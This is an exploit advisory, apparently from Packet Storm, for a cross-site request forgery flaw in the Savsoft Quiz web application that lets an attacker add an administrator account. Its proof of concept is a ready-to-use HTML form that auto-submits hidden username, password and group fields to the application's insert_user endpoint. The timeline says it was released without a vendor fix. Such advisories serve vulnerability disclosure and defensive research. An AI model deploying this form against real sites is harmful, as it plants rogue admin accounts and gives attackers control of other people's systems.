Savsoft Quiz suffers from a cross site request forgery vulnerability.
2303cca1251931c791c673983e97fde38714e38eee850a8e9e07cfc1e5240d7e[+] Author: TUNISIAN CYBER
[+] Exploit Title: Savsoft Quiz Cross-Site Request Forgery (Add Admin) Vulnerability
[+] Date: 24-02-2014
[+] Category: WebApp
[+] Tested on: KaliLinux/Windows 7 Pro
[+] CWE: CWE-352
[+] Vendor: http://savsoftquiz.com/web/buy-now/
[+] Friendly Sites: na3il.com,th3-creative.com
1.OVERVIEW:
SuSavsoft Quiz suffers from a Cross-Site Request Forgery (Add Admin) Vulnerability.
2.Version:
All
3.Background:
Savsoft Quiz is a php based web application to create and manage online quiz,
test, exam on your web server or hosting
http://savsoftquiz.com/web/buy-now/
4.Proof Of Concept:
<form method="POST" name="form0" action="http://savsoftquiz.com/quizdemo/index.php/user_data/insert_user">
<input type="hidden" name="username" value="miuter12"/>
<input type="hidden" name="first_name" value="TUNISIAN"/>
<input type="hidden" name="last_name" value="CYBER"/>
<input type="hidden" name="user_email" value="g4k@hotmail.es"/>
<input type="hidden" name="user_password" value="p@assw0rd"/>
<input type="hidden" name="confirm_password" value="p@assw0rd"/>
<input type="hidden" name="user_credit" value="blank"/>
<input type="hidden" name="user_group" value="group1"/>
<input type="submit" value="Click ME!"/>
</form>
</body>
</html>
5.Solution(s):
n/a
6.TIME-LINE:
2014-02-22: Vulnerability was discovered.
2014-02-22:Contact with vendor
2014-02-23:No Reply
2014-02-24:Vulnerability Released
7.Greetings:
Xmax-tn
Xtech-set
N43il
Sec4ver,E4A Members
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed